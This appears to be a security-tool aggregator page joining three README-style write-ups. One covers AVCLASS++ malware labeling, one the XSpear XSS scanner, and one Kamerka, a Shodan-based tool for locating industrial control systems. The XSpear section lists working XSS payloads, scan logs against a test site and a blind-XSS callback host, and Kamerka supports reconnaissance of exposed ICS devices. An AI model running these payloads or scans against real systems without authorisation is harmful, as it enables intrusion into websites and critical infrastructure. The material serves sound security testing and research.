python avclass_labeler.py -lb data/malheurReference_lb.json -v -fam > malheurReference.labels
This will produce a file called malheurReference_lb.families with two columns:
virut 441
allaple 301
podnuha 300
The file indicates that 441 samples were classified in the virut family, 301 as allaple, and 300 as podnuha.
This switch is very similar to using the following shell command:
cut -f 2 malheurReference.labels | sort | uniq -c | sort -nr
The main difference is that using the -fam switch all SINGLETON samples, i.e., those for which no label was found, are grouped into a fake SINGLETONS family, while the shell command would leave each singleton as a separate family.

PUP Classification
AVCLASS++ also has a -pup switch to classify a sample as Potentially Unwanted Program (PUP) or malware. This classification looks for PUP-related keywords (e.g., pup, pua, unwanted, adware) in the AV labels.
python avclass_labeler.py -lb data/malheurReference_lb.json -v -pup > malheurReference.labels
With the -pup switch the output of the malheurReference.labels file looks like this:
aca2d12934935b070df8f50e06a20539 adrotator 1
67d15459e1f85898851148511c86d88d adultbrowser 0
The digit at the end is a Boolean flag that indicates sample aca2d12934935b070df8f50e06a20539 is (likely) PUP, but sample 67d15459e1f85898851148511c86d88d is (likely) not. This enables us to focus on PUP research [2] or non-PUP research!
The PUP classification tends to be conservative, i.e., if it says the sample is PUP, it most likely is. But, if it says that it is not PUP, it could still be PUP if the AV labels do not contain PUP-related keywords. Note that it is possible that some samples from a family get the PUP flag while other samples from the same family do not because the PUP-related keywords may not appear in the labels of all samples from the same family. To address this issue, you can combine the -pup switch with the -fam switch. This combination will add into the families file the classification of the family as malware or PUP, based on a majority vote among the samples in a family.
python avclass_labeler.py -lb data/malheurReference_lb.json -v -pup -fam > malheurReference.labels
This will produce a file called malheurReference_lb.families with five columns:
# Family  Total Malware PUP FamType
virut 441 441 0 malware
magiccasino 173 0 173 pup
ejik 168 124 44 malware
For virut, the numbers indicate all the 441 virut samples are classified as malware, and thus the last column states that virut is a malware family. For magiccasino, all 173 samples are labeled as PUP, thus the family is PUP. For ejik, out of the 168 samples, 124 are labeled as malware and 44 as PUP, so the family is classified as malware.

Ground Truth Evaluation
If you have ground truth for some malware samples, i.e., you know the true family for those samples, you can evaluate the accuracy of the labeling output by AVCLASS++ on those samples with respect to that ground truth. The evaluation metrics used are precision, recall, and F1 measure.
python avclass_labeler.py -lb data/malheurReference_lb.json -v -gt data/malheurReference_gt.tsv -eval > data/malheurReference.labels
The output includes these lines:
Calculating precision and recall
3131 out of 3131
Precision: 90.81 Recall: 93.95 F1-Measure: 92.35
The last line corresponds to the accuracy metrics obtained by comparing AVClass results with the provided ground truth.
Each line in the data/malheurReference_gt.tsv file has two tab-separated columns:
0058780b175c3ce5e244f595951f611b8a24bee2 CASINO
This sample 0058780b175c3ce5e244f595951f611b8a24bee2 is known to be of the CASINO family. Each sample in the input file should also appear in the ground truth file. Note that the particular label assigned to each family does not matter. What matters is that all samples in the same family are assigned the same family name (i.e., the same string in the second column).
The ground truth can be obtained from publicly available malware datasets. The one in data/malheurReference_gt.tsv comes from the Malheur dataset. There are other public datasets with ground truth such as Drebin and Malicia.

Preparation

Generic Token Detection
The labeling takes as input a file with generic tokens that should be ignored in the AV labels, e.g., trojan, virus, generic, linux. By default, the labeling uses the data/default.generics generic tokens file. You can edit that file to add additional generic tokens you feel we are missing.
The original AVCLASS paper [1] presents an automatic approach to identify generic tokens, which requires ground truth, i.e., it requires knowing the true family for each input sample. Not only that, but the ground truth should be large, i.e., contain at least one hundred thousand samples. In the evaluation, AVCLASS identified generic tokens using as ground truth the concatenation of all datasets for which we had ground truth. This requirement of a large ground truth dataset is why we expect most users will skip this step and simply use our provided default file.
If you want to test generic token detection you can do:
python avclass_generic_detect.py -lb data/malheurReference_lb.json -gt data/malheurReference_gt.tsv -tgen 10 > malheurReference.gen 
Each line in the data/malheurReference_gt.tsv file has two tab-separated columns:
0058780b175c3ce5e244f595951f611b8a24bee2 CASINO
which indicates that sample 0058780b175c3ce5e244f595951f611b8a24bee2 is known to be of the CASINO family.
The -tgen 10 switch is a threshold for the minimum number of families where a token has to be observed to be considered generic. If the switch is omitted, the default threshold of 8 is used.
The above command outputs two files: malheurReference.gen and malheurReference_lb.gen. Each of them has 2 columns: token and number of families where the token was observed. File malheurReference.gen is the final output with the detected generic tokens for which the number of families is above the given threshold. The file malheurReference_lb.gen has this information for all tokens. Thus, malheurReference.gen is a subset of malheurReference_lb.gen.
However, note that in the above command you are trying to identify generic tokens from a small dataset since Drebin only contains 3K labeled samples. Thus, malheurReference.gen only contains 25 identified generic tokens. Using those 25 generic tokens will produce significantly worse results than using the generic tokens in data/default.generics.

Alias Detection
Different vendors may assign different names (i.e., aliases) for the same family. For example, some vendors may use zeus and others zbot as aliases for the same malware family. The labeling takes as input a file with aliases that should be merged. By default, the labeling uses the data/default.aliases aliases file. You can edit that file to add additional aliases you feel we are missing.
The original AVCLASS paper [1] describes an automatic approach to identify aliases. Note that the alias detection approach requires as input the AV labels for a large set of samples, e.g., several million samples. In contrast with the generic token detection, the input samples for alias detection do not need to be labeled, i.e., there is no need to know their family. In the evaluation, AVCLASS identified aliases using as input the largest of its unlabeled datasets, which contained nearly 8M samples. This requirement of a large input dataset is why we expect most users will skip this step and simply use our provided default file.
If you want to test alias detection you can do:
python avclass_alias_detect.py -lb data/malheurReference_lb.json -nalias 100 -talias 0.98 > malheurReference.aliases
The -nalias threshold provides the minimum number of samples two tokens need to be observed in to be considered aliases. If the switch is not provided the default is 20.
The -talias threshold provides the minimum fraction of times that the samples appear together. If the switch is not provided the default is 0.94 (94%).
The above command outputs two files: malheurReference.aliases and malheurReference_lb.alias. Each of them has 6 columns:
  1. t1: token that is an alias
  2. t2: family for which t1 is an alias
  3. |t1|: number of input samples where t1 was observed
  4. |t2|: number of input samples where t2 was observed
  5. |t1^t2|: number of input samples where both t1 and t2 were observed
  6. |t1^t2|/|t1|: ratio of input samples where both t1 and t2 were observed over the number of input samples where t1 was observed
File malheurReference.aliases is the final output with the detected aliases that satisfy the -nalias and -talias thresholds. The file malheurReference_lb.alias has this information for all tokens. Thus, malheurReference.aliases is a subset of malheurReference_lb.alias.
However, note that in the above command you are trying to identify aliases from a small dataset since Drebin only contains 3K samples. Thus, malheurReference.aliases only contains 6 identified aliases. Using those 6 aliases will produce significantly worse results than using the aliases in data/default.aliases. As mentioned, to improve the identified aliases you should provide as input several million samples.

Acknowledgment
We deeply respect the original authors of AVCLASS. References, with love:
  • [1] Marcos Sebastián, Richard Rivera, Platon Kotzias, and Juan Caballero. 2016. AVCLASS: A tool for Massive Malware Labeling. In Proceedings of the 19th International Symposium on Research in Attacks, Intrusions and Defenses (RAID'16). 230--253. (If you wish to cite the original AVCLASS, please cite this paper; if you wish to cite AVCLASS++, just refer to this repository URL)
  • [2] Platon Kotzias, Srdjan Matic, Richard Rivera, and Juan Caballero. 2015. Certified PUP: Abuse in Authenticode Code Signing. In Proceedings of the 22nd ACM Conference on Computer and Communication Security (CCS'15). 465--478.
The techniques introduced in AVCLASS++ are based on the following papers:
  • [3] Xiaojin Zhu and Zoubin Ghahramani. 2002. Learning from Labeled and Unlabeled Data with Label Propagation. Technical Report CMU-CALD-02-107, Carnegie Mellon University.
  • [4] Hyrum S. Anderson and Phil Roth. 2018. EMBER: An Open Dataset for Training Static PE Malware Machine Learning Models. CoRR, abs/1804.04637.
  • [5] Stefano Schiavoni, Federico Maggi, Lorenzo Cavallaro, and Stefano Zanero. 2014. Phoenix: DGA-Based Botnet Tracking and Intelligence. In Proceeding of the 11th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA'14). 192--211.


XSpear v1.3 - Powerfull XSS Scanning And Parameter Analysis Tool


XSpear is an XSS scanner distributed as a Ruby gem.

Key features
  • Pattern matching based XSS scanning
  • Detect alert/confirm/prompt events in a headless browser (with Selenium)
  • Testing request/response for XSS protection bypass and reflected (or all) params
    • Reflected params
    • All params (for blind XSS, anything)
    • Filtered test: event handler, HTML tag, special char, useful code
  • Testing blind XSS (with XSS Hunter, ezXSS, HBXSS, etc.; any URL-based blind test)
  • Dynamic/static analysis
    • Find SQL error patterns
    • Analyse security headers (CSP, HSTS, X-Frame-Options, XSS-Protection, etc.)
    • Analyse other headers (Server version, Content-Type, etc.)
    • XSS testing on the URI path
  • Scanning from a raw file (Burp Suite, ZAP request)
  • Run XSpear from Ruby code (as a gem library)
  • Table-based CLI report with filtered rules and the tested raw queries (URLs)
  • Testing at selected parameters
  • Supported output formats: cli, json
    • cli: summary, filtered rules (params), raw query
  • Verbose levels (0~3)
    • 0: quiet mode (only result)
    • 1: show scanning status (default)
    • 2: show scanning logs
    • 3: show detail log (req/res)
  • Custom callback code to test various attack vectors
  • Config file support

Installation
Install it yourself as:
$ gem install XSpear
Or install it yourself as (local file):
$ gem install XSpear-{version}.gem
Add this line to your application's Gemfile:
gem 'XSpear'
And then execute:
$ bundle

Dependency gems
colorize, selenium-webdriver, terminal-table, progress_bar
If these gems were installed automatically as dependencies but XSpear behaves abnormally, install them manually with the following commands.
$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table
$ gem install progress_bar

Usage on cli
Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2

[ Options ]
-u, --url=target_URL [required] Target Url
-d, --data=POST Body [optional] POST Method Body data
-a, --test-all-params [optional] test to all params(include not reflected)
--headers=HEADERS [optional] Add HTTP Headers
--cookie=COOKIE [optional] Add Cookie
--raw=FILENAME [optional] Load raw file(e.g raw_sample.txt)
-p, --param=PARAM [optional] Test paramters
-b, --BLIND=URL [optional] Add vector of Blind XSS
+ with XSS Hunter, ezXSS, HBXSS, etc...
+ e.g : -b https://hahwul.xss.ht
-t, --threads=NUMBER [optional] thread , default: 10
-o, --output=FORMAT [optional] Output format (cli , json)
-c, --config=FILENAME [optional] Using config.json
-v, --verbose=0~3 [optional] Show log depth
+ v=0 : quite mode(only result)
+ v=1 : show scanning status(default)
+ v=2 : show scanning logs
+ v=3 : show detail log(req/res)
-h, --help Prints this help
--version Show XSpear version
--update Show how to update

Result types
  • (I)NFO: information (e.g. SQL error, filtered rule, reflected params, etc.)
  • (V)ULN: vulnerable to XSS; alert/prompt/confirm confirmed with Selenium
  • (L)OW: low severity issue
  • (M)EDIUM: medium severity issue
  • (H)IGH: high severity issue

Verbose Mode
[0] quiet mode (show only result)
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0
Only the report is shown.
[1] show progress bar (default)
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1
[*] analysis request..
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]

[#######################################] [249/249] [100.00%] [01:05] [00:00] [ 3.83/s]
...
Then the report is shown.
[2] show scanning logs
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
[*] analysis request..
[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]
[-] [22:42:41] [200/OK] 'STATIC' not reflected
[-] [22:42:41] [200/OK] 'cat' not reflected <script>alert(45)</script>
[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]
[-] [22:42:54] [200/OK] 'cat' not reflected <img/src onerror=alert(45)>
[-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
[H] [22:42:54] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
[V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
...
Then the report is shown.
[3] show scanning detail logs
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3
[*] analysis request..
[-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[-] [22:56:21] [200/OK] 'STATIC' not reflected
[-] [22:56:21] [200/OK] cat=123rEfe6 in url
...
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
...
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[H] [22:57:33] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
...
Then the report is shown.

Case by Case
Scanning XSS
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
Only JSON output
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
Set scanning thread
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
Testing at selected parameters
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
Testing at all parameters
(With this option every parameter is tested, whether or not it is reflected.)
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
Testing blind xss(all params)
(Should be used as much as possible because Blind XSS is everywhere)
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a

# Set your blind XSS host with the -b option
For pipeline use
$ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json

# -u : target
# -b : blind XSS host
# -a : test all params (including parameters that are not reflected)
# -v : verbose level; 0 shows no logs, only the result
# -o : output option; json
Resulting JSON data:
{
"starttime": "2019-12-25 00:02:58 +0900",
"endtime": "2019-12-25 00:03:31 +0900",
"issue_count": 25,
"issue_list": [{
"id": 0,
"type": "INFO",
"issue": "DYNAMIC ANALYSIS",
"method": "GET",
"param": "cat",
"payload": "XsPeaR\"",
"description": "Found SQL Error Pattern"
}, {
"id": 1,
"type": "INFO",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Found Server: nginx/1.4.1"
}, {
"id": 2,
"type": "INFO",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Not set HSTS"
}, {
"id": 3,
"type": "INFO",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Content-Type: text/html"
}, {
"id": 4,
"type": "LOW",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Not Set X-Frame-Options"
}, {
"id": 5,
"type": "MIDUM",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Not Set CSP"
}, {
"id": 6,
"type": "INFO",
"issue": "REFLECTED",
"method": "GET",
"param": "cat",
"payload": "rEfe6",
"description": "reflected parameter"
}, {
"id": 7,
"type": "INFO",
"issue": "FILERD RULE",
"method": "GET",
"param": "cat",
"payload": "onhwul=64",
"description": "not filtered event handler on{any} pattern"
}
....
, {
"id": 17,
"type": "HIGH",
"issue": "XSS",
"method": "GET",
"param": "cat",
"payload": "<audio src onloadstart=alert(45)>",
"description": "reflected HTML5 XSS Code"
}, {
"id": 18,
"type": "HIGH",
"issue": "XSS",
"method": "GET",
"param": "cat",
"payload": "<keygen autofocus onfocus=alert(45)>",
"description": "reflected onfocus XSS Code"
....
}, {
"id": 24,
"type": "HIGH",
"issue": "XSS",
"method": "GET",
"param": "cat",
"payload": "<marquee onstart=alert(45)>",
"description": "triggered <marquee onstart=alert(45)>"
}]
}
(Items marked as triggered are actually payloads that work in the browser.)
XSpear on Burpsuite
https://github.com/hahwul/XSpear/tree/master/forBurp
etc...

Sample log
Scanning XSS
xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
) (
( /( )\ )
)\())(()/( ( ) (
((_)\ /(_))` ) ))\ ( /( )(
__((_)(_)) /(/( /((_))(_))(()\
\ \/ // __|((_)_\ (_)) ((_)_ ((_)
> < \__ \| '_ \)/ -_)/ _` || '_|
/_/\_\|___/| .__/ \___|\__,_||_| />
|_| \ /<
{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
/ \<
\> [ v1.1.5 ]
...snip...
[*] finish scan. the report is being generated..
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
| [ XSpear report ] |
| http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fff... (snip) |
| 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues. |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
| NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
| 0 | INFO | STATIC ANALYSIS | GET | - | <original query> | Found Server: nginx/1.4.1 |
| 1 | INFO | STATIC ANALYSIS | GET | - | <original query> | Not set HSTS |
| 2 | INFO | STATIC ANALYSIS | GET | - | <original query> | Content-Type: text/html |
| 3 | LOW | STATIC ANALYSIS | GET | - | <original query> | Not Set X-Frame-Options |
| 4 | MIDUM | STATIC ANALYSIS | GET | - | <original query> | Not Set CSP |
| 5 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern |
| 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |
| 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |
| 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code |
| 9 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | reflected HTML5 XSS Code |
| 10 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert`45`"> | reflected HTML5 XSS Code |
| 11 | HIGH | XSS | GET | cat | <select autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
| 12 | HIGH | XSS | GET | cat | <input autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
| 13 | HIGH | XSS | GET | cat | <textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
| 14 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code |
| 15 | HIGH | XSS | GET | cat | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code |
| 16 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
| 17 | HIGH | XSS | GET | cat | <video/poster/onerror=alert(45)> | reflected HTML5 XSS Code |
| 18 | HIGH | XSS | GET | cat | <keygen autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
| 19 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
| 20 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | triggered <marquee onstart=alert(45)> |
| 21 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert(45)"> | triggered <details/open/ontoggle="alert(45)"> |
| 22 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | triggered <audio src onloadstart=alert(45)> |
| 23 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
< Available Objects >
[cat] param
+ Available Special Char: ` ( \ ' { ) } [ : $ ]
+ Available Event Handler: "onBeforeEditFocus","onAbort","onActivate","onAfterUpdate","onBeforeCopy","onAfterPrint","onBeforeActivate","onBeforeCut","onBeforeDeactivate","onChange","onBeforePrint","onBounce","onBeforeUnload","onCellChange","onBeforePaste","onClick","onBegin","onBlur","onBeforeUpdate","onDataSetChanged","onCut","onDblClick","onCopy","onContextMenu","onDataSetComplete","onDeactivate","onDataAvailable","onControlSelect","onDrag","onDrop","onDragEnd","onEnd","onDragLeave","onDragStart","onDragOver","onDragEnter","onDragDrop","onError","onErrorUpdate","onFinish","onFilterChange","onKeyPress","onHelp","onFocus","onInput","onHashChange","onKeyDown","onFocusIn","onFocusOut","onMessage","onMouseDown","onLoad","onLayoutComplete","onMouseEnter","onLoseCapture","onloadstart","onMediaError","onKeyUp","onMediaComplete","onMouseOver","onMouseWheel","onMove","onMouseMove","onMouseOut","onOffline","onMoveStart","onMouseLeave","onMouseUp","onMoveEnd","onPropertyChange","onOnline","onPause","onPaste","onReadyStateChange","onRedo","onProgress","onPopState","onOutOfSync","onRepeat","onResume","onRowExit","onReset","onResizeEnd","onRowsEnter","onResizeStart","onReverse","onRowDelete","onRowInserted","onResize","onStop","onSeek","onSelect","onSubmit","onStorage","onStart","onScroll","onSelectionChange","onSyncRestored","onSelectStart","onUnload","ontouchstart","onbeforescriptexecute","onTimeError","onURLFlip","ontouchmove","ontouchend","onTrackChange","onUndo","onafterscriptexecute","onpointermove","onpointerleave","onpointerup","onpointerover","onpointerdown","onpointerenter","onloadstart","onloadend","onpointerout"
+ Available HTML Tag: "script","img","embed","video","audio","meta","style","frame","iframe","svg","object","frameset","applet"
+ Available Useful Code: "document.cookie","document.location","window.location"

< Raw Query >
[0] http://testphp.vulnweb.com/listproducts.php?-
..snip..
[19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&zfdfasdf=124fffff
[20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E&zfdfasdf=124fffff
[21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E&zfdfasdf=124fffff
[22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E&zfdfasdf=124fffff
[23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E&zfdfasdf=124fffff

...snip...
to JSON
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fffff" -v 1 -o json
{"starttime":"2019-08-14 23:58:12 +0900","endtime":"2019-08-14 23:58:44 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":3,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":4,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":5,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":6,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":20,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":21,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"},{"id":22,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":23,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"}]}

Usage on ruby code
require 'XSpear'
require 'json'   # needed for JSON.parse below

# Set options
options = {}
options['thread'] = 30
options['cookie'] = "data=123"
options['blind'] = "https://hahwul.xss.ht"
options['output'] = "json"   # output format as a string, as on the CLI (-o json)

# Create XSpear object with url, options
s = XspearScan.new "https://www.hahwul.com?target_url", options

# Scanning
s.run
result = s.report.to_json
r = JSON.parse result

Add Scanning Module
1) Add a makeQueryPattern
makeQueryPattern('type', 'query,', 'pattern', 'category', "description", "callback function")
# type: f(iltered?) r(eflected?) x(ss?)
# category: i(nfo) v(uln) l(ow) m(edium) h(igh)

# e.g.
# makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)
2) For a different check, write a callback class that inherits from ScanCallbackFunc and overrides run, e.g.
class CallbackStringMatch < ScanCallbackFunc
  # Returns [matched?, message]; here the check is whether the query string is reflected in the body
  def run
    if @response.body.include? @query
      [true, "reflected #{@query}"]
    else
      [false, "not reflected #{@query}"]
    end
  end
end
Parent class(ScanCallbackFunc)
class ScanCallbackFunc()
def initialize(url, method, query, response)
@url = url
@method = method
@query = query
@response = response
# self.run
end

def run
# override
end
end
Common Callback Class
  • CallbackXSSSelenium
  • CallbackErrorPatternMatch
  • CallbackCheckHeaders
  • CallbackStringMatch
  • CallbackNotAdded
  • etc...

Update
if normal user
$ gem update XSpear
if developers (soft)
$ git pull -v
if developers (hard)
$ git reset --hard HEAD; git pull -v

Development
After checking out the repo, run bin/setup to install dependencies. Then, run rake spec to run the tests. You can also run bin/console for an interactive prompt that will allow you to experiment.
To install this gem onto your local machine, run bundle exec rake install. To release a new version, update the version number in version.rb, and then run bundle exec rake release, which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org.

ScreenShot

< Scanning Image>


  < CLI-Report 1 >

  < CLI-Report 2 >

  < JSON Report >

Video




Kamerka GUI - Ultimate Internet Of Things/Industrial Control Systems Reconnaissance Tool


Ultimate Internet of Things/Industrial Control Systems reconnaissance tool.

Powered by Shodan - Supported by Binary Edge & WhoisXMLAPI
writeup - https://medium.com/@woj_ciech/hack-the-planet-with-%EA%93%98amerka-gui-ultimate-internet-of-things-industrial-control-systems-5ff7d9686b29
Demo - https://woj-ciech.github.io/kamerka-demo/kamerka.html

Requirements
  • beautiful soup
  • python3
  • django
  • pynmea2
  • celery
  • redis
  • Shodan
  • BinaryEdge
  • WHOISXMLAPI
  • Flickr
  • Google Maps API
pip3 install -r requirements.txt
Make sure your API keys are correct and put them in keys.json in the main directory.

Run
python3 manage.py makemigrations
python3 manage.py migrate
python3 manage.py runserver
In a new window (in the main directory) run the celery worker:
celery worker -A kamerka --loglevel=info
In a new window fire up redis:
redis-server
And the server should be available on https://localhost:8000/

Search

Search for Industrial Control Devices in specific country

  • "All results" checkbox means get all results from Shodan; if it's turned off, only the first page (100 results) will be downloaded.
  • "Own database" checkbox does not work but shows that it is possible to integrate your own geolocation database. Let me know if you have access to a better one than Shodan's default.

Search for Internet of things in specific coordinates
Type your coordinates in the format "lat,lon"; the hardcoded radius is 20km.


Dashboard


Maps

Los Angeles map


Industrial Control Systems in Canada


Device map & details


